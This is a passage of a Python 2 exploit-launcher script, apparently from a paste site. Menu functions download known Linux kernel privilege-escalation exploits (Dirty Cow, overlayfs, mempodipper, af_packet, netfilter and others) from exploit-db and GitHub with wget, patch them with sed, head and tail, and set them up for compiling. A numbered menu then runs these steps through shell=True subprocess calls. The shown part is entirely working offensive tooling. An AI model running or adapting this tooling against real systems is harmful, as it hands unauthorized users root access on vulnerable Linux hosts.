  637.   run(commands)
  638.  
  639. def sgid():
  640.   commands = [
  641.     ('Downloading...','wget https://www.exploit-db.com/download/33824 -O sgid_expl.c'),
  642.     ('Compile with:','echo "gcc -o sgid_expl sgid_expl.c"')
  643.   ]
  644.   run(commands)
  645.  
  646. def overlayfs_1():
  647.   commands = [
  648.     ('Downloading...','wget https://www.exploit-db.com/download/37292 -O overlayfs.c'),
  649.     ('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
  650.   ]
  651.   run(commands)
  652.  
  653. def libfutex():
  654.   commands = [
  655.     ('Downloading...','wget https://www.exploit-db.com/download/35370 -O libfutex.c'),
  656.     ('Compile with:','echo "gcc -o libfutex libfutex.c -lpthread"')
  657.   ]
  658.   run(commands)
  659.  
  660. def mempodipper():
  661.   commands = [
  662.     ('Downloading...','wget https://www.exploit-db.com/download/18411 -O mempodipper.c'),
  663.     ('Compile with:','echo "gcc -o mempodipper mempodipper.c"')
  664.   ]
  665.   run(commands)
  666.  
  667. def alpha_omega():
  668.   commands = [
  669.     ('Downloading...','wget https://www.exploit-db.com/download/17391 -O alpha-omega.c'),
  670.     ('Compile with:','echo "gcc -o alpha-omega alpha-omega.c"')
  671.   ]
  672.   run(commands)
  673.  
  674. def dirtycow():
  675.   commands = [
  676.     ('Downloading...','wget https://www.exploit-db.com/download/40616 -O dirtycow_64.c'),
  677.     ('Fixing...',"cp dirtycow_64.c dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/\/* 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 177;/unsigned int sc_len = 177; *\//g' dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/*\/ 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 136;/unsigned int sc_len = 136;\/*/g' dirtycow_32.c"),
  678.     ('Compile with:','echo "gcc -o dirtycow_64 dirtycow_64.c -pthread"; echo "gcc -o dirtycow_32 dirtycow_32.c -pthread"')
  679.   ]
  680.   run(commands)
  681.  
  682. def msr():
  683.   commands = [
  684.     ('Downloading...','wget https://www.exploit-db.com/download/27297 -O msr_expl.c'),
  685.     ('Compile with:','echo "gcc -o msr_expl msr_expl.c"')
  686.   ]
  687.   run(commands)
  688.  
  689. def perf_swevent_init():
  690.   commands = [
  691.     ('Downloading...','wget https://www.exploit-db.com/download/26131 -O perf.c'),
  692.     ('Compile with:','echo "gcc -o perf perf.c"')
  693.   ]
  694.   run(commands)
  695.  
  696. def overlayfs_2():
  697.   commands = [
  698.     ('Downloading...','wget https://www.exploit-db.com/download/39166 -O overlayfs.c'),
  699.     ('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
  700.   ]
  701.   run(commands)
  702.  
  703. def overlayfs_3():
  704.   commands = [
  705.     ('Downloading...','wget https://www.exploit-db.com/download/39230 -O overlayfs.c'),
  706.     ('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
  707.   ]
  708.   run(commands)
  709.  
  710. def af_packet():
  711.   commands = [
  712.     ('Downloading...','wget https://www.exploit-db.com/download/40871 -O af_packet.c'),
  713.     ('Compile with: ','echo "gcc -o af_packet af_packet.c -lpthread"')
  714.   ]
  715.   run(commands)
  716.  
  717. def double_fdput():
  718.   commands = [
  719.     ('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip -O double_fdput.zip'),
  720.     ('Unpacking...','unzip double_fdput.zip; cd 39772; tar xvf exploit.tar;'),
  721.     ('Compile with: ','echo "cd 39772/ebpf_mapfd_doubleput_exploit; ./compile.sh"'),
  722.     ('Run ./doubleput','')
  723.   ]
  724.   run(commands)
  725.  
  726. def netfilter():
  727.   commands = [
  728.     ('Downloading...','wget https://www.exploit-db.com/download/40049 -O netfilter.c'),
  729.     ('Fixing...','tail -n 50 netfilter.c > pwn.c; head -n 213 netfilter.c > intermediate.c; tail -n 208 intermediate.c > decr.c'),
  730.     ('Compile with:','echo "gcc -o decr decr.c -m32 -O2; gcc pwn.c -O2 -o pwn"'),
  731.     ('Run decr, then pwn',''),
  732.     ('Cleaning up...','rm netfilter.c intermediate.c')
  733.   ]
  734.   run(commands)
  735.  
  736. def refcount():
  737.   commands = [
  738.     ('Downloading...','wget https://www.exploit-db.com/download/39277 -O refcount.c'),
  739.     ('Compile with:','echo "gcc -o refcount refcount.c -lkeyutils -Wall"')
  740.   ]
  741.   run(commands)
  742.  
  743. exploits_linux_local = [
  744.   ("linux-exploit-suggester"    ,   linux_exploit_suggester),
  745.   ("unix_privesc_check"     ,   unix_privesc_check),
  746.   ("kernel 2.4.x / 2.6.x (sock_sendpage 1)"   ,   sendpage_1),
  747.   ("kernel 2.4 / 2.6 (sock_sendpage 2)" ,   sendpage_2),
  748.   ("kernel < 2.6.22 (ftruncate)"    ,   ftruncate),
  749.   ("kernel < 2.6.34 (cap_sys_admin)"    ,   cap_sys_admin),
  750.   ("kernel 2.6.27 < 2.6.36 (compat)"    ,   compat),
  751.   ("kernel < 2.6.36-rc1 (can bcm)"  ,   can_bcm),
  752.   ("kernel <= 2.6.36-rc8 (rds protocol)"   , rdsProtocol),
  753.   ("*kernel < 2.6.36.2 (half nelson)"    ,   halfNelson),
  754.   ("*kernel <= 2.6.37 (full nelson)"    ,   fullNelson),
  755.   ("kernel 2.6 (udev)"  ,   udev),
  756.   ("kernel 3.13 (sgid)" ,   sgid),
  757.   ("kernel 3.13.0 < 3.19 (overlayfs 1)" ,   overlayfs_1),
  758.   ("kernel 3.14.5 (libfutex)"   ,   libfutex),
  759.   ("kernel 2.6.39 <= 3.2.2 (mempodipper)"   ,   mempodipper),
  760.   ("*kernel 2.6.28 / 3.0 (alpha-omega)"  ,   alpha_omega),
  761.   ("kernel 2.6.22 < 3.9 (Dirty Cow)"  ,   dirtycow),
  762.   ("kernel 3.7.6 (msr)" ,   msr),
  763.   ("*kernel < 3.8.9 (perf_swevent_init)" ,   perf_swevent_init),
  764.   ("kernel <= 4.3.3 (overlayfs 2)"    ,   overlayfs_2),
  765.   ("kernel 4.3.3 (overlayfs 3)"   ,   overlayfs_3),
  766.   ("kernel 4.4.0 (af_packet)"   ,   af_packet),
  767.   ("kernel 4.4.x (double-fdput)"   ,   double_fdput),
  768.   ("kernel 4.4.0-21 (netfilter)"    ,   netfilter),
  769.   ("*kernel 4.4.1 (refcount)"    ,   refcount)
  770. ]
  771.  
  772. # ------------------------------------
  773. # UTILITY
  774. # ------------------------------------
  775.  
  776. def endpoints(i):
  777.   try:
  778.     i = int(i)
  779.   except ValueError:
  780.     return 0
  781.   if i <= 0:
  782.     return 0
  783.   elif i == 1:
  784.     return len(exploits_windows_remote)
  785.   elif i == 2:
  786.     return len(exploits_windows_remote) + len(exploits_windows_local)
  787.   elif i == 3:
  788.     return len(exploits_windows_remote) + len(exploits_windows_local) + len(exploits_linux_remote)
  789.   elif i >= 4:
  790.     return len(exploits_windows_remote) + len(exploits_windows_local) + len(exploits_linux_remote) + len(exploits_linux_local)
  791.  
  792. def usage():
  793.   print "USAGE: %s <exploit id>" % sys.argv[0]
  794.   print "\nWindows Remote Exploits:"
  795.   for i in range(endpoints(0), endpoints(1)):
  796.     print "%i: %s" % (i, exploits_windows_remote[i-endpoints(0)][0])
  797.   print "\nWindows Local Exploits:"
  798.   for i in range(endpoints(1), endpoints(2)):
  799.     print "%i: %s" % (i, exploits_windows_local[i-endpoints(1)][0])
  800.   print "\nLinux Remote Exploits:"
  801.   for i in range(endpoints(2), endpoints(3)):
  802.     print "%i: %s" % (i, exploits_linux_remote[i-endpoints(2)][0])
  803.   print "\nLinux Local Exploits:"
  804.   for i in range(endpoints(3), endpoints(4)):
  805.     print "%i: %s" % (i, exploits_linux_local[i-endpoints(3)][0])
  806.  
  807. def select(i):
  808.   if i < 0 or i >= endpoints(4):
  809.     return False
  810.  
  811.   if i < endpoints(1):
  812.     printStep("Constructing %s" % exploits_windows_remote[i-endpoints(0)][0])
  813.     exploits_windows_remote[i-endpoints(0)][1]()
  814.   elif i < endpoints(2):
  815.     printStep("Constructing %s" % exploits_windows_local[i-endpoints(1)][0])
  816.     exploits_windows_local[i-endpoints(1)][1]()
  817.   elif i < endpoints(3):
  818.     printStep("Constructing %s" % exploits_linux_remote[i-endpoints(2)][0])
  819.     exploits_linux_remote[i-endpoints(2)][1]()
  820.   elif i < endpoints(4):
  821.     printStep("Constructing %s" % exploits_linux_local[i-endpoints(3)][0])
  822.     exploits_linux_local[i-endpoints(3)][1]()
  823.   return True
  824.  
  825. def run(commands):
  826.   try:
  827.     for c in commands:
  828.       printStep(c[0])
  829.       subprocess.check_call(c[1], shell=True)
  830.   except subprocess.CalledProcessError:
  831.     printErr("Command failed")
  832.     return False
  833.   except OSError:
  834.     printErr("Command failed")
  835.     return False
  836.   return True
  837.  
  838. def printStep(s):
  839.   print "%s [*] %s %s" % ('\033[93m', s, '\033[0m')
  840.  
  841. def printErr(s):
  842.   print "%s [!] %s %s" % ('\033[91m', s, '\033[0m')
  843.  
  844. def printGood(s):
  845.   print "%s [+] %s %s" % ('\033[92m', s, '\033[0m')
  846.  
  847. # ------------------------------------
  848. # MAIN
  849. # ------------------------------------
  850.  
  851. if len(sys.argv) <> 2:
  852.   usage()
  853.   sys.exit()
  854.  
  855. try:
  856.   success = select(int(sys.argv[1]))
  857.   if not success:
  858.     print "[-] Invalid selection: %s" % sys.argv[1]
  859.     usage()
  860. except ValueError:
  861.   print "[-] Invalid selection: %s" % sys.argv[1]
  862.   usage()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement